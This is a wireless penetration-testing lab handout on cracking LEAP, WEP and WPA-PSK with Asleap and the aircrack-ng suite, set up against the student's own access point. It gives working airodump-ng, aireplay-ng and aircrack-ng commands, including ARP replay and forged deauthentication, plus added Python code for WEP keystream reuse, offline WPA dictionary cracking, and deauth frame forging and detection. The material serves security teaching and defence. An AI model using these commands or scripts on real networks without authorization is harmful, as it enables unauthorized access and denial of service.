Section 4: Cracking 802.11 Encryption and Authentication

In the previous section we showed the vulnerabilities of open wireless LANs. In this section we'll show some of the techniques and tools used to break wireless encryption and authentication. Once you have cracked the encryption, you can use all the tools from the previous section to see what everyone is doing. Some of these techniques are vendor- or protocol-specific attacks. We'll use both Windows and Linux tools to crack encryption and authentication!

1/12/11 1 www.inpnet.org www.hotlabs.org
LAB 4.1: LEAP Cracking - Asleap / Pre-Hashed Dictionary File

The purpose of this lab is to learn how to break the encryption and authentication methods used in securing wireless networks.

WEP encryption, used for confidentiality and integrity on a wireless LAN, is a weak construction around the RC4 stream cipher: the per-frame RC4 key is a 24-bit initialization vector (IV), sent in the clear, prepended to the shared WEP key. The IV space is small enough that IVs repeat, and certain IV values leak information about the key bytes, so an attacker who collects enough encrypted frames can recover the key statistically. With the original FMS/KoreK attacks this meant on the order of 800,000 to 1,000,000 WEP-encrypted frames; the PTW attack used by current aircrack-ng versions needs far fewer (typically tens of thousands of unique IVs for a 64-bit key). In this lab you will capture and crack a WEP key.

WPA-PSK uses a passphrase for authenticating wireless clients to the network. The WPA passphrase is an 8-63 ASCII character text string from which, together with the SSID, the Pairwise Master Key is derived. The passphrase is susceptible to a dictionary attack once the 4-way handshake has been captured, and this lab will show you how to capture and crack a WPA key.

LEAP authentication is a Cisco proprietary mechanism that allows users to connect to a wireless network using a username and a password. The username is sent in cleartext; the password itself is never sent, but the client answers a challenge with an MS-CHAP-style response computed from a hash of the password, and that challenge/response pair can be attacked offline. A tool called Asleap does this by comparing the observed response against a pre-hashed dictionary.

Product Information / Source
  Omnipeek Personal - Free - http://wildpackets.com
  Asleap - http://asleap.sourceforge.net/

Where, When, Why
You have already learned how to capture passwords, web traffic and email content, and how to sniff open wireless networks. But most enterprise-class wireless LANs implement some form of encryption and authentication. Some of those security mechanisms are weak and therefore susceptible to attack. A wireless pen tester must know how to identify those threats and know the susceptibility of the network to attack. It is also necessary to be able to perform the cracks to illustrate to a customer the weaknesses of the wireless network security.

Requirements / Dependencies
  Omnipeek Personal
  Wireshark
  AirPcap USB adapter
  Aircrack
  TamoSoft CommView
  Aireplay
  Nokia N800 wireless client
  CoWPAtty
  Asleap
  Large dictionary file

Running an Asleap Crack against a LEAP Authentication
Step 1. Prepare to capture the LEAP authentication with Omnipeek.
Step 2. The instructor will tell you when to start the capture and on what channel.
Step 3. Start your capture to catch the LEAP conversation.
Step 4. Save the capture file as a TCPDump (pcap) file.
Step 5. Open a command prompt.
Step 6. Change to the Asleap directory.
Step 7. Run Asleap against the capture file using the pre-hashed dictionary.
Lab 4.2: WEP Cracking and Acceleration

Aircrack-ng is used to statistically attack traffic captured from WEP-encrypted wireless networks in order to recover the WEP key in use. It can also run a dictionary attack against WPA pre-shared keys. Once a key is recovered, one can associate with the access point as a legitimate user.

Product Information: http://www.aircrack-ng.org - Free / Open Source (GPL, MPL)
Source: http://www.aircrack-ng.org
Where, When, Why: Attack. This tool is designed to recover/crack WEP keys and/or WPA keys.
Usage and Features: Recover/crack WEP or WPA keys.
Requirements / Dependencies: Linux or Windows operating system; captured traffic of the target access point; time.
Lab Part 1 - Using Airodump-ng, Aircrack-ng and Aireplay-ng to quickly crack a WEP key

What you will do in this lab:
  Use airodump-ng to find a target
  Capture encrypted traffic
  Use aireplay-ng to accelerate IV collection
  Recover the WEP key using a statistical attack with aircrack-ng

Step 1. Configure your access point for a 64-bit WEP key of 009E4DD7E8 and have your N800 act as a client and connect to your access point. In this tutorial the access point SSID is LinksysL but yours will be as assigned earlier. Start hitcast on your N800s to generate traffic.
Step 2. Launch airodump-ng to view your access point and N800 as potential targets:

  ./ath_monitor        (puts your card in monitor mode)
  airodump-ng ath0
We see plenty of potential targets that are encrypted, a few of which have authenticated wireless clients with traffic.

Step 3. Once you have located the N800's traffic on your network, switch channels to monitor only that channel. My 'linksysl' access point is on channel 6, as yours should be by default.

  airodump-ng -w /tmp/linksysl_traffic --channel 6 ath0

Step 4. Now we can see that we are just on channel 6 and that we have one wireless station (00:13:46:9F:AC:36) connected to the access point linksysl. Since we are dumping into a capture file, everything that our card can see will be logged. The data frames are what interest us when cracking WEP keys: each one carries a fresh IV in the clear, and the more unique IVs you collect, the less time the statistical attack takes. With only one client authenticated and little traffic, it will take a long time to collect these (we will see how a replay attack can dramatically decrease this).

Step 5. Now you wait! As each unique initialization vector (IV) is collected (indicated by the increase in the #Data column) you get closer to having enough IVs to hand to aircrack-ng. You have probably noticed that it can take a very long time to collect enough IVs to crack the key. With the older FMS/KoreK statistics, for a 64-bit key you want anywhere from 300,000 to 700,000 unique IVs, and for 128-bit and higher you want a million or more; the PTW attack (the default in aircrack-ng 0.9 and later) usually succeeds with far fewer, on the order of tens of thousands, provided the IVs come from ARP traffic. Either way we need to generate a lot more traffic so that we collect IVs faster, and we can do so with aireplay-ng. From a command prompt type:

  aireplay-ng -3 -b 00:18:39:C8:F3:0F -h 00:13:46:9F:AC:36 ath0

where -b is YOUR ACCESS POINT MAC and -h is YOUR N800's MAC. This tells aireplay-ng that you want to launch an attack of type 3, the ARP request replay attack: an encrypted ARP request is picked out of the air (recognisable by its fixed size even though it is encrypted) and 'replayed', i.e. re-sent to the access point over and over. The AP accepts each copy because it is validly encrypted and rebroadcasts (or answers) it, and every rebroadcast is a new frame under a new IV. Those frames are what make the #Data counter climb. Note that -h must be the MAC of a station that is currently associated, since the AP drops frames from unassociated sources, and that your driver must support injection.

Step 6. 312,631 unique IVs should be more than enough for us to start an attack against a 64-bit key, so let's start. (You have no idea how long the key is, so a good rule is to always start with the shortest and move up. We can specify the guessed key length with the -n switch.)

  aircrack-ng -n 64 /tmp/linksysl_traffic*.cap

This will give you a list of all the networks for which data has been collected. Since we didn't supply the --ivs switch to airodump-ng, it logged all traffic instead of just the IVs. We see that we have 357,169 IVs for the linksysl network. Type 5 to select that network and the tool will do the rest.

Since we had enough IVs it only took 18 seconds to recover the 64-bit key used: 00:9E:4D:D7:E8.

Step 7. Now you can connect to the target access point as a legitimate user.

What you learned in this lab:
In this lab you learned to use aircrack-ng to:
  Pick a WEP-enabled wireless access point as a target
  Collect unique IVs
  Statistically attack the IVs in order to recover the WEP key
Lab 4.3: WPA Cracking

Aircrack-ng can also run a dictionary attack against WPA pre-shared keys (PSK). Once a key is recovered, one can associate with the access point as a legitimate user.

Product Information: http://www.aircrack-ng.org - Free / Open Source (GPL, MPL)
Source: http://www.aircrack-ng.org
Where, When, Why: Attack. This tool is designed to recover/crack WEP keys and/or WPA keys.
Usage and Features: Recover/crack WEP or WPA keys.
Requirements / Dependencies: Linux or Windows operating system; captured traffic of the target access point (including the 4-way handshake); time.
What you will do in this lab:
  Use airodump-ng to find a target
  Capture encrypted traffic
  Use aireplay-ng to deauthenticate a client
  Recover the WPA key using aircrack-ng

Lab Part 1 - Using Airodump-ng, Aireplay-ng, and Aircrack-ng to crack a WPA key

Step 1. Configure your access point with a WPA-PSK passphrase of applesauce and have your N800 act as a client and connect to your access point. In this tutorial the access point SSID is LinksysL but yours will be as assigned earlier. Start hitcast on your N800s to generate traffic.
Step 2. Launch airodump-ng to find your access point and N800 as potential targets, making sure we log to a capture file so that we can capture the 4-way handshake:

  airodump-ng -w /tmp/wpa_linksysl --channel 6 ath0
Step 3. Notice that our linksysl network has now switched to WPA with the TKIP cipher, so our previous WEP-style attack of collecting unique IVs is no longer useful. In order to crack a WPA key we need to see the EAPOL 4-way handshake that takes place at the very beginning of the association with the access point; obviously we have missed that, as a client is already associated. We have two options:
  1. Wait for someone else (or the same client) to associate and authenticate with the access point.
  2. Force the already-associated client to disconnect and reconnect using a forged deauthentication frame.
Step 4. For the sake of time we will use the second option, forging deauthentication frames with the aireplay-ng tool:

  aireplay-ng -0 30 -a 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0

where -a is your ACCESS POINT MAC and -c is YOUR N800's MAC. This launches a deauth attack against the wireless client, forcing it to reauthenticate and therefore allowing us to sniff the 4-way handshake. It works because 802.11 management frames carry no authentication (before 802.11w), so the client cannot tell a forged deauth from a real one. When the handshake has been captured, airodump-ng shows "WPA handshake: <BSSID>" in the top-right corner of its display.
Step 5. Use aircrack-ng to verify that we have actually collected the 4-way handshake:

  aircrack-ng -w /root/wordlist.txt /tmp/*.cap
(This time we give it a dictionary file to test passphrases against.)

Step 6. Seeing that we have collected the handshake, we choose the target network (3) and let the cracking phase take place.
Step 7. Now you wait! The time it takes will depend on whether the passphrase is in the dictionary at all, the speed of your computer(s), and the size of your dictionary file. Each candidate costs 4096 iterations of HMAC-SHA1 (PBKDF2) plus a MIC check against the handshake, so the rate is only hundreds to a few thousand candidates per second per CPU core. Unlike WEP, collecting more traffic does not help, and a passphrase that is not in the wordlist will not be recovered.
Lab 4.4: Aircrack-ng

Aircrack-ng is used to statistically attack traffic captured from WEP-encrypted wireless networks in order to recover the WEP key in use. It can also run a dictionary attack against WPA pre-shared keys. Once a key is recovered, one can associate with the access point as a legitimate user.

Product Information: http://www.aircrack-ng.org - Free / Open Source (GPL, MPL)
Source: http://www.aircrack-ng.org
Where, When, Why: Attack. This tool is designed to recover/crack WEP keys and/or WPA keys.
Usage and Features: Recover/crack WEP or WPA keys.
Requirements / Dependencies: Linux or Windows operating system; captured traffic of the target access point; time.
What you will do in this lab:
  Use airodump-ng to find a target
  Capture encrypted traffic
  Recover the WEP key

Lab Part 1 - Using Aircrack-ng to crack a WEP key

Step 1. Launch airodump-ng to view potential targets. (It is not necessary to log to a file or choose a channel at this point, because we don't know anything about our target yet.)

  airodump-ng ath0

(Run the ath_monitor script first if you need to put your card into monitor mode.)
Step 2. We see plenty of potential targets that are encrypted, a few of which have authenticated wireless clients with traffic.
Step 3. Pick your target and switch channels to monitor only that channel. For this tutorial I will use the 'linksysl' access point, which is encrypted with WEP and on channel 6.

  airodump-ng -w /tmp/linksysl_traffic --channel 6 ath0

Step 4. Now we can see that we are just on channel 6 and that we have one wireless station (00:13:46:9F:AC:36) connected to the access point linksysl. Since we are dumping into a capture file, everything that our card can see will be logged. The data frames are what interest us when cracking WEP keys: each one carries a fresh IV in the clear, and the more unique IVs you collect, the less time the statistical attack takes. With only one client authenticated and little traffic, it will take a long time to collect these (we will see how a replay attack can dramatically decrease this).
Step 5. Now you wait! As each unique initialization vector (IV) is collected (indicated by the increase in the #Data column) you get closer to having enough IVs to hand to aircrack-ng. Once you have enough, point aircrack-ng at the capture file. With the older FMS/KoreK statistics, for a 64-bit key you want anywhere from 300,000 to 700,000 unique IVs, and for 128-bit and higher you want a million or more; the PTW attack (the default in aircrack-ng 0.9 and later) usually succeeds with far fewer, on the order of tens of thousands, provided the IVs come from ARP traffic.
Step 6. 312,631 unique IVs should be more than enough for us to start an attack against a 64-bit key, so let's start. (You have no idea how long the key is, so a good rule is to always start with the shortest and move up. We can specify the guessed key length with the -n switch.)
Step 7. Run aircrack-ng against the capture:

  aircrack-ng -n 64 /tmp/linksysl_traffic*.cap

This will give you a list of all the networks for which data has been collected. Since we didn't supply the --ivs switch to airodump-ng, it logged all traffic instead of just the IVs. We see that we have 357,169 IVs for the linksysl network. Type 5 to select that network and the tool will do the rest.

Since we had enough IVs it only took 18 seconds to recover the 64-bit key used: 00:9E:4D:D7:E8.

Step 8. Now you can connect to the target access point as a legitimate user.

What you learned in this lab:
In this lab you learned to use aircrack-ng to:
  Pick a WEP-enabled wireless access point as a target
  Collect unique IVs
  Statistically attack the IVs in order to recover the WEP key
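The two WEP labs above count unique IVs because WEP's per-frame RC4 key is nothing more than the 24-bit IV, sent in the clear, prepended to the shared key. The following Python script is an added example, not part of the original handout or of aircrack-ng: it builds WEP frame bodies with the lab's 64-bit key 009E4DD7E8, decrypts and integrity-checks them, and then shows what an eavesdropper gets as soon as an IV repeats and the plaintext of one of the two frames (here an ARP request, whose LLC/SNAP and ARP header bytes are predictable) is known. The ARP request, the second payload and the IV value are constructed sample data.

```python
"""WEP encapsulation, RC4, and keystream reuse. Added example, not part of the
original handout; everything except the lab key is constructed for illustration."""
import math
import struct
import zlib

LAB_WEP_KEY = bytes.fromhex("009E4DD7E8")          # 40-bit key from the lab (64-bit WEP)
LLC_SNAP_ARP = bytes.fromhex("aaaa030000000806")   # LLC/SNAP header that starts every ARP frame


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4: key-scheduling algorithm, then XOR the data with the PRGA keystream."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def icv(payload: bytes) -> bytes:
    """WEP integrity check value: plain CRC-32, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)


def wep_encrypt(wep_key: bytes, iv: bytes, payload: bytes, key_id: int = 0) -> bytes:
    """Return the WEP frame body: IV(3) | key-id byte | RC4_{IV||key}(payload || ICV)."""
    assert len(iv) == 3 and len(wep_key) in (5, 13)
    return iv + bytes([key_id << 6]) + rc4(iv + wep_key, payload + icv(payload))


def wep_decrypt(wep_key: bytes, body: bytes):
    """Return (payload, icv_ok). The IV is read straight from the frame: it is never secret."""
    iv = body[:3]
    plain = rc4(iv + wep_key, body[4:])
    payload, tag = plain[:-4], plain[-4:]
    return payload, tag == icv(payload)


def keystream_from_known_plaintext(body: bytes, known_payload: bytes) -> bytes:
    """Ciphertext XOR known plaintext gives the RC4 keystream for this IV (no key needed)."""
    known = known_payload + icv(known_payload)
    return bytes(c ^ p for c, p in zip(body[4:], known))


def decrypt_with_keystream(body: bytes, keystream: bytes) -> bytes:
    """Decrypt another frame that reused the same IV, using only the recovered keystream."""
    plain = bytes(c ^ k for c, k in zip(body[4:], keystream))
    return plain[:-4]  # drop the ICV


def arp_request(sender_mac: bytes, sender_ip: bytes, target_ip: bytes) -> bytes:
    """LLC/SNAP + 28-byte ARP request (constructed sample). Every WEP data frame starts with
    the same LLC/SNAP bytes, which is where the statistical attacks get known keystream bytes."""
    arp = struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, 1,
                      sender_mac, sender_ip, b"\x00" * 6, target_ip)
    return LLC_SNAP_ARP + arp


def iv_reuse_demo() -> bytes:
    """Two frames under the same IV: knowing one plaintext decrypts the other without the key."""
    iv = b"\x2a\x01\x7f"                                   # constructed IV value
    known = arp_request(bytes.fromhex("0013469fac36"),     # the lab client's MAC
                        bytes([192, 168, 1, 100]), bytes([192, 168, 1, 1]))
    frame_a = wep_encrypt(LAB_WEP_KEY, iv, known)
    secret = b"POST /login user=bob"                       # constructed second payload
    frame_b = wep_encrypt(LAB_WEP_KEY, iv, secret)
    keystream = keystream_from_known_plaintext(frame_a, known)
    return decrypt_with_keystream(frame_b, keystream)


def expected_frames_until_iv_repeat() -> float:
    """Birthday bound for a 24-bit IV chosen at random: sqrt(pi/2 * 2^24), about 5,100 frames.
    Drivers that use a counter instead wrap after 2^24 frames at the latest."""
    return math.sqrt(math.pi / 2 * 2 ** 24)


if __name__ == "__main__":
    body = wep_encrypt(LAB_WEP_KEY, b"\x00\x00\x01", b"hello")
    print("frame body:", body.hex())
    print("decrypts to:", wep_decrypt(LAB_WEP_KEY, body))
    print("recovered without the key:", iv_reuse_demo())
    print("frames until an IV repeats (random IVs): %.0f" % expected_frames_until_iv_repeat())
```

The keystream-reuse path is the simplest of WEP's failures; the FMS/KoreK/PTW statistics that aircrack-ng runs go further and recover the key itself from the relation between weak IVs and the first keystream byte, which is why the known LLC/SNAP prefix and a large pool of distinct IVs (not just repeated ones) are what matter.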
Lab Part 2 - Using Aircrack-ng to crack a WPA key

What you will do in this lab:
  Use airodump-ng to find a target
  Capture encrypted traffic
  Recover the WPA key

Step 1. Launch airodump-ng to find potential targets, making sure we log to a capture file so that we can capture the 4-way handshake:

  airodump-ng -w /tmp/wpa_linksysl --channel 6 ath0

Step 2. Notice that our linksysl network has now switched to WPA with the TKIP cipher, so our previous WEP-style attack of collecting unique IVs is no longer useful. In order to crack a WPA key we need to see the EAPOL 4-way handshake that takes place at the very beginning of the association with the access point; obviously we have missed that, as a client is already associated.
Step 3. We have two options:
  1. Wait for someone else (or the same client) to associate and authenticate with the access point.
  2. Force the already-associated client to disconnect and reconnect using a forged deauthentication frame.
Step 4. For the sake of time we will use the second option, forging deauthentication frames with the aireplay-ng tool that is part of the aircrack-ng suite:

  aireplay-ng -0 30 -a 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0

This launches a deauth attack against the wireless client, forcing it to reauthenticate and therefore allowing us to sniff the 4-way handshake. The same capture works for WPA2/CCMP networks; only the MIC algorithm differs, and aircrack-ng handles both.
Step 5. Use aircrack-ng to verify that we have actually collected the 4-way handshake:

  aircrack-ng -w /tmp/wordlists/large_dictionary_file.txt /tmp/wpa_linksysl*.cap

(This time we give it a large dictionary file to test passphrases against.)
Step 6. Seeing that we have collected the handshake, we choose the target network (3) and let the cracking phase take place.
Step 7. Now you wait! The time it takes will depend on whether the passphrase is in the dictionary at all, the speed of your computer(s), and the size of your dictionary file. The supplied dictionary file is very large.
Step 8. We have the WPA key! 'security' was the word used as the passphrase. Now we can authenticate with the access point as a regular user.
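Both WPA labs above depend on one fact: the 4-way handshake is all an attacker needs, because every quantity in it except the PMK is visible on the air. The Python below is an added example (not from the handout or the aircrack-ng project) of what aircrack-ng -w does for each candidate passphrase: derive the PMK from passphrase and SSID with PBKDF2, expand it to the PTK with both MAC addresses and both nonces, and recompute the MIC on EAPOL message 2. The MAC addresses are the lab's; the nonces, replay counter and EAPOL-Key frame are constructed sample data laid out in the WPA/TKIP format (descriptor type 0xFE, key descriptor version 1, MIC at offset 81 of the EAPOL frame).

```python
"""WPA-PSK handshake verification and dictionary attack. Added example; the handshake
below is constructed with the lab passphrase, not taken from a real capture."""
import hashlib
import hmac
import struct
from typing import Optional

SSID = "linksysl"
AP_MAC = bytes.fromhex("001839c8f30f")    # lab access point
STA_MAC = bytes.fromhex("0013469fac36")   # lab N800 client
MIC_OFFSET = 81                           # MIC field position inside the EAPOL-Key frame


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes). This is the slow step,
    and it is why the SSID acts as a salt: tables for one SSID do not help against another."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]   # KCK = [0:16], KEK = [16:32], TK = [32:48], TKIP MIC keys follow


def eapol_mic(kck: bytes, eapol: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed.
    Version 1 (WPA/TKIP) = HMAC-MD5; version 2 (WPA2/CCMP) = HMAC-SHA1 truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if key_descriptor_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_message2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """EAPOL-Key message 2 (client -> AP) in WPA format: descriptor 0xFE, key info 0x0109
    (version 1, pairwise, MIC present), key length 32, replay counter 1, no key data. Constructed."""
    body = struct.pack("!BHHQ32s16s8s8s16sH", 0xFE, 0x0109, 32, 1, snonce,
                       b"\x00" * 16, b"\x00" * 8, b"\x00" * 8, mic, 0)
    return struct.pack("!BBH", 1, 3, len(body)) + body   # EAPOL version 1, type 3 (Key)


def make_handshake(passphrase: str) -> dict:
    """Produce what a sniffer sees: both nonces and the client's message 2 carrying its MIC."""
    anonce = hashlib.sha256(b"constructed anonce").digest()   # constructed, not random
    snonce = hashlib.sha256(b"constructed snonce").digest()
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, anonce, snonce)[:16]
    mic = eapol_mic(kck, build_message2(snonce), 1)
    return {"anonce": anonce, "snonce": snonce, "eapol": build_message2(snonce, mic), "keyver": 1}


def crack(handshake: dict, wordlist) -> Optional[str]:
    """What aircrack-ng -w does: derive PMK and PTK per candidate and compare the MIC."""
    observed_mic = handshake["eapol"][MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:       # not a valid WPA passphrase length, skip it
            continue
        pmk = pmk_from_passphrase(candidate, SSID)
        kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, handshake["eapol"], handshake["keyver"]), observed_mic):
            return candidate
    return None


if __name__ == "__main__":
    hs = make_handshake("applesauce")
    print("MIC on the wire:", hs["eapol"][MIC_OFFSET:MIC_OFFSET + 16].hex())
    print("recovered:", crack(hs, ["password", "security", "short", "applesauce"]))
```

Nothing in crack() uses the PMK of the real network; only the observed MIC is compared, which is why a handshake capture is enough for an offline attack and why the only defences are a passphrase that is not in any wordlist and, later, 802.11w to make the deauthentication step fail.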
Lab 4.5: Aireplay-ng

Aireplay-ng is a utility used to dramatically decrease the time it takes to collect enough data to crack a WEP key, or to forge deauthentication frames to cause a denial of service.

Product Information: http://www.aircrack-ng.org - GPL
Source: http://www.aircrack-ng.org/
Where, When, Why: Attack. It can take a lot of valuable time to collect enough data on a WEP-enabled wireless network to crack the key; time that Joe IT might not have in order to conduct his penetration test. Aireplay-ng allows Joe to dramatically reduce the time it takes to break into a WEP-enabled access point so that he can spend more time focusing on other weaknesses of the client network.
Usage and Features: Different attack modes. Can use live captured packets, forged packets, or archived packets.
Requirements / Dependencies: Linux operating system; patched (injection-capable) drivers for a supported wireless card; supported wireless card.

What you will do in this lab:
  Find a WEP-enabled access point
  Launch a replay attack
Lab Part 1 - Using Aireplay-ng to speed up IV collection

Step 1. Become root by typing su at a command prompt and entering the root password.
Step 2. Launch airodump-ng in order to view target access points.
Step 3. Find the target access point and switch airodump-ng to monitor only that channel. We will use linksysl on channel 6.

  airodump-ng -w /tmp/linksysl_capture --channel 6 ath0

Step 4. There is not a lot of traffic, so we would be here for a long time collecting enough IVs to launch an attack against the WEP key. Launching a replay attack will fix that.
Step 5. Start the replay:

  aireplay-ng -3 -b 00:18:39:C8:F3:0F -h 00:13:46:9F:AC:36 ath0

Step 6. This tells aireplay-ng that you want to launch an attack of type 3, the ARP request replay attack: an encrypted ARP request is picked out of the air and 'replayed', i.e. re-sent to the access point continuously, and the access point rebroadcasts each copy as a new frame under a new IV. The -b switch is the MAC address of the access point, -h is the MAC address of an authenticated client (the AP will ignore frames from a source that is not associated), and then we supply the interface from which the replay attack will be launched.
Step 7. At this rate the amount of time it will take is dramatically less, and we can soon send our packets off to aircrack-ng to be cracked. Overall it took us about 10 minutes to collect the amount of traffic (128,332 packets, as seen in the screenshot) that otherwise would have had us sitting around for weeks.

NOTE: See the attached video created by muts of BackTrack entitled "Clientless WEP Cracking" for a demonstration of how to crack the WEP key of an access point with no connected clients, as well as "Cracking WEP in 10 minutes" to see aireplay-ng in action.

What you learned in this lab:
In this lab you learned to use aireplay-ng to:
  1. Speed up an attack against a WEP-enabled access point
Lab Part 2 - Using Aireplay-ng to deauthenticate a client

What you will do in this lab:
  Locate a wireless client and forge deauthentication frames to force a disconnection/reconnection

Step 1. Become root by typing su at a command prompt and entering the root password.
Step 2. Launch airodump-ng in order to view possible targets by typing:

  airodump-ng ath0

Step 3. Choose the client that you would like to deauthenticate and forge deauth frames using the aireplay-ng -0 attack. -a supplies the BSSID of the access point, and it is always more effective if you also supply the -c station switch; otherwise the frames are sent to the broadcast address, which many clients ignore and which is therefore not very reliable.
Step 4. Send the deauthentication frames:

  aireplay-ng -0 10 -a 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0

If successful, this attack will force the station 00:13:46:9F:AC:36 to disconnect. The count (10 here) is the number of deauth rounds; each round is a burst of frames sent both to the client (as if from the AP) and to the AP (as if from the client), so even a small count is visible as a spike of management frames to anyone watching the channel. This is useful in a denial of service attack, for sniffing the EAPOL 4-way handshake, or for capturing other credentials that might be passed at the beginning of a session.
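What aireplay-ng -0 actually puts on the air is a 26-byte management frame that any pre-802.11w station will accept, because management frames carry no authentication. The Python below is an added example, not part of the handout or of aireplay-ng: it builds a deauthentication frame for the lab's AP and client addresses, parses it back, and runs a simple WIDS-style counter over a constructed sequence of frames to flag the burst that a deauth attack produces. The duration value, the reason code 7 and the detection threshold are assumptions chosen for illustration.

```python
"""802.11 deauthentication frame: build, parse, and detect bursts. Added example."""
import struct
from collections import Counter

AP_MAC = bytes.fromhex("001839c8f30f")    # lab access point (BSSID)
STA_MAC = bytes.fromhex("0013469fac36")   # lab N800 client
REASON_CLASS3_FROM_NONASSOC = 7           # reason code assumed here; tools commonly use it

FC_DEAUTH = 0x00C0    # frame control: protocol 0, type 0 (management), subtype 12 (deauth)
FC_DISASSOC = 0x00A0  # type 0, subtype 10 (disassociation): same effect on the client


def build_deauth(dst: bytes, src: bytes, bssid: bytes, seq: int,
                 reason: int = REASON_CLASS3_FROM_NONASSOC) -> bytes:
    """24-byte management header (addr1=receiver, addr2=transmitter, addr3=BSSID) + 2-byte reason.
    A forged frame simply copies the AP's MAC into addr2: nothing on the wire proves who sent it."""
    header = struct.pack("<HH6s6s6sH", FC_DEAUTH, 0x013A, dst, src, bssid, (seq << 4) & 0xFFF0)
    return header + struct.pack("<H", reason)


def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason_or_None) for a management frame."""
    fc, _duration, a1, a2, a3, _seq = struct.unpack("<HH6s6s6sH", frame[:24])
    ftype = (fc >> 2) & 0x3
    subtype = (fc >> 4) & 0xF
    if ftype != 0:
        raise ValueError("not a management frame")
    reason = struct.unpack("<H", frame[24:26])[0] if subtype in (10, 12) else None
    return subtype, a1, a2, a3, reason


def deauth_bursts(frames, threshold: int) -> dict:
    """Count deauth/disassoc frames per (bssid, receiver) and return the pairs at or over
    the threshold. A real AP sends a handful of these; aireplay-ng -0 sends dozens per count."""
    counts = Counter()
    for frame in frames:
        subtype, a1, _a2, a3, _reason = parse_mgmt(frame)
        if subtype in (10, 12):
            counts[(a3, a1)] += 1
    return {pair: n for pair, n in counts.items() if n >= threshold}


def constructed_capture() -> list:
    """Constructed sample: one benign deauth from the AP, then a forged burst in both directions."""
    frames = [build_deauth(STA_MAC, AP_MAC, AP_MAC, seq=1, reason=3)]   # reason 3: STA is leaving
    for i in range(64):                                                   # attacker posing as the AP
        frames.append(build_deauth(STA_MAC, AP_MAC, AP_MAC, seq=100 + i))
    for i in range(64):                                                   # attacker posing as the client
        frames.append(build_deauth(AP_MAC, STA_MAC, AP_MAC, seq=200 + i))
    return frames


if __name__ == "__main__":
    f = build_deauth(STA_MAC, AP_MAC, AP_MAC, seq=1)
    print("deauth frame:", f.hex())
    print("parsed:", parse_mgmt(f))
    print("bursts:", deauth_bursts(constructed_capture(), threshold=10))
```

The sequence numbers are the one thing a forger cannot copy from the real AP without tracking it, which is why a WIDS that sees deauthentication frames whose sequence numbers jump away from the AP's normal counter, or simply sees dozens of them per second, has a reliable signal.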
Lab 4.6: Airodump-ng

Airodump-ng is a wireless discovery utility that will display all access points within range of your wireless card, along with their signal strength, encryption status and the wireless clients in the area, and log all information gathered to a packet capture file for analysis.

Product Information: http://www.aircrack-ng.org - Free / Open Source (GPL, MPL)
Source: http://www.aircrack-ng.org
Where, When, Why: Network analysis. Joe IT would use this tool when he needs an idea of what access points are in the area and who is connecting to them, how much traffic is moving on the network, what access points clients are probing for, and what type of encryption is used on the networks. He can also very easily use this tool to log captured network traffic to a file.
Usage and Features:
  Display access points / wireless networks in range
  Display the encryption types used by the wireless networks
  Show which wireless clients are probing for or associated with which AP
  Log captured traffic to a capture file
Requirements / Dependencies: Linux or Windows operating system; wireless card with a supported chipset (the Ubiquiti card has the supported Atheros-based chipset).
Where to Go for More Information: http://www.aircrack-ng.org
What you will do in this lab:
  View wireless traffic in range
  Log traffic to a capture file

Step 1. Put the card into monitor mode by running the script ath_monitor at the command prompt.
Step 2. Notice that we need to run this as root, so type su followed by the root password.
Step 3. Launch airodump-ng with the appropriate parameters. The parameters that can be supplied are listed in the screenshot. A simple way to launch the application with logging to a file and hopping across all channels is:

  airodump-ng -w /tmp/capture_file ath0

Step 4. Once that command is executed the screen will display all information that can be gathered in the area.

From the screenshot we can see in the top left-hand corner the BSSID, which is the MAC address of each access point in range. We then see the power or signal strength (usually a good indicator of how close it is), followed by the beacons being sent from the access point, the data frames in the air, the channel, the encryption type, and the ESSID (SSID). If the SSID is not broadcast you will see a placeholder <length: <int>>. At the bottom we see wireless stations (wireless clients that are either associated with a certain access point or just in the area and probing).

Step 5. Since we didn't specify a channel as a parameter, we are hopping all channels (notice the CH value in the top left changing). You can lock to a certain channel by stopping the program with Ctrl-C and adding the --channel parameter:

  airodump-ng -w /tmp/capture_file --channel n ath0

